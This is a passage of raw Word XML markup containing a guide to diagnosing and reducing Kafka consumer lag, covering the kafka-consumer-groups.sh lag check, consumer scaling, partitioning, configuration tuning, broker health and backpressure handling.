          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="810"/>
    </w:p>
    <w:p w14:paraId="27DF2F12" w14:textId="62F52DAB" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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If a Kafka consumer is lagging behind, it means that it is not consuming messages as quickly as the producer is producing them, causing a backlog of unprocessed messages. This can lead to several issues, such as increased latency, inefficient processing, and resource strain. Here are several steps to take to address a Kafka consumer lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D86F4" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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1. Check Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF0812" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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Before taking any corrective actions, you need to check the consumer lag. Kafka provides metrics that show the consumer’s lag, which is the difference between the latest message offset in a partition and the offset the consumer has processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247574AE" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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Tools for checking consumer lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4909FE65" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Kafka Consumer Group Command</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use the kafka-consumer-groups.sh command to check the consumer lag. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F713199" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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kafka-consumer-groups.sh --bootstrap-server &lt;kafka-broker&gt; --describe --group &lt;consumer-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54888A4E" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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his will display the lag (difference between the consumer’s offset and the latest offset) for each partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EB65E" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Kafka Monitoring Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Burrow</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor consumer lag continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16FA6F" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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2. Increase Consumer Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58923656" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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If the consumer is lagging because it cannot process messages fast enough, you can try the following methods to increase its throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B5C0D" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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a. Increase Consumer Parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C47649F" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Multiple Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Scale the consumer group by adding more consumers to the group. Kafka ensures that each partition is consumed by only one consumer in a consumer group, so adding more consumers can help in parallelizing the consumption process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBF204" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Increase the number of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer group has fewer consumers than partitions, increasing the number of partitions can help distribute the load more effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB05D84" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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b. Optimize Consumer Processing Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18007788" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Efficient Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Analyze your consumer’s processing logic. If the consumer performs heavy processing (e.g., data transformations, I/O operations), consider optimizing this logic, possibly using batching or more efficient algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6696E" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Batch Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of processing each message individually, consider processing messages in batches. This can significantly reduce the overhead and increase throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3796AC" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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3. Increase Consumer Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C2C09" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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he consumer might be lagging due to resource constraints like CPU, memory, or network bandwidth. In such cases, you can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11523029" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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cale up the Consumer Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Increase the resources (CPU, memory) allocated to the consumer instance to handle more processing power.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E5509" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156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Use More Powerful Hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run the consumer on more powerful hardware or in a cloud environment with better resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E10054" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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4. Tune Kafka Consumer Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D669FD" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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You can tweak several Kafka consumer configuration parameters to improve the performance of the consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACCFB9" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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a. Increase the fetch.min.bytes and fetch.max.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9CA9E" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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hese parameters control the amount of data the consumer fetches in a single request. Increasing these values can help the consumer fetch more data at once, reducing the number of fetch requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEE425" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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b. Adjust the max.poll.records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471323A0" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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his controls how many records the consumer retrieves per poll. Increasing it can help in processing more messages in each poll, reducing lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A9634" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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c. Tune session.timeout.ms and heartbeat.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C712400" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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nsure these values are properly set to prevent consumers from being considered dead and rebalance too frequently, which can add overhead and delay message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F0F69" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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d. Adjust max.poll.interval.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747EE8E9" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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If the consumer takes longer to process messages, you may want to increase this value to prevent consumer group rebalancing due to slow processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA3492" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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lastRenderedPageBreak/>
        <w:t>5. Use Kafka Consumer Groups Effectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F9DAE" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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onsumer Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that rebalancing is happening as efficiently as possible. If a rebalance is triggered too frequently, it can cause delays. To prevent frequent rebalancing, you can adjust the rebalance.timeout.ms setting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0F17C" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Avoid Under-Partitioned Topics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the number of partitions in your topic is sufficient to handle the load. A topic with too few partitions and many consumers can lead to inefficient parallelism, contributing to lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCCCA48" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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6. Ensure the Consumer Is Not Throttled by Network or Disk I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14791AC1" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Network Bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that network bandwidth is not a bottleneck. Kafka consumers can sometimes lag due to insufficient network throughput between the consumer and the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504157D" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the consumer is writing the data to disk (e.g., for local storage or database writes), ensure that the disk throughput is not a limiting factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B918CE" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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7. Upgrade Kafka or Consumer Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF959BF" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Kafka and its clients are regularly updated to improve performance. Ensure that you're using the latest stable version of Kafka and its consumer libraries to benefit from performance improvements and bug fixes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4D618" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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8. Check for Broker or Consumer Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC62B29" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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ometimes, consumer lag is caused by issues with brokers or consumers. Check the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72B8EE" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Broker Health</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all brokers are up and healthy. If some brokers are down or under heavy load, consumers may struggle to fetch data from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D7805" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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onsumer Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Check for exceptions or failures in the consumer logs that might indicate issues in the processing flow or message handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6257DF" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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9. Investigate Kafka Broker Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1C9D2" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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If the Kafka brokers themselves are experiencing performance issues, it could affect consumer consumption. For example, if the brokers are not able to serve data quickly enough, consumers will fall behind. To troubleshoot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543865E3" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Monitor Broker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use Kafka’s JMX metrics or third-party tools like Prometheus to monitor broker performance. Look for high disk usage, memory issues, or CPU bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9A530" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Increase Broker Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If brokers are overloaded, increase their resources or consider scaling out the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132CF3F" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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10. Implement Consumer Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65456F30" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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In some scenarios, a consumer might lag due to processing backpressure, i.e., it’s overwhelmed by too many messages at once. You can handle this by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C77355" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Backpressure Mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement strategies like rate-limiting, queueing, or delaying message processing to allow the consumer to catch up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A05721" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157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Pause and Resume</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka consumers support pausing and resuming message consumption. If the consumer is lagging due to temporary overload, you can pause consumption until the backlog is processed, then resume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B38E5" w14:textId="77777777" w:rsidR="008A7200"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10354F5">
          <v:rect id="_x0000_i3241" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="420293F7" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200"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Summary of Steps to Handle Consumer Lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F33E6C" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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heck consumer lag</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Kafka tools (kafka-consumer-groups.sh, monitoring tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AEB151" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Increase consumer throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding more consumers to the consumer group or optimizing processing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD54279" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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cale consumer resources</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle higher processing loads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963F1D4" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Tune Kafka consumer configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as fetch.min.bytes, fetch.max.bytes, max.poll.records, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A410BA2" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Optimize partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensure the topic has enough partitions for the number of consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6839D8" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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heck for network or disk I/O bottlenecks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that may be limiting consumption speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157FCDD7" w14:textId="77777777" w:rsidR="008A7200" w:rsidRPr="004269A3" w:rsidRDefault="008A7200" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="158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Upgrade Kafka versions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
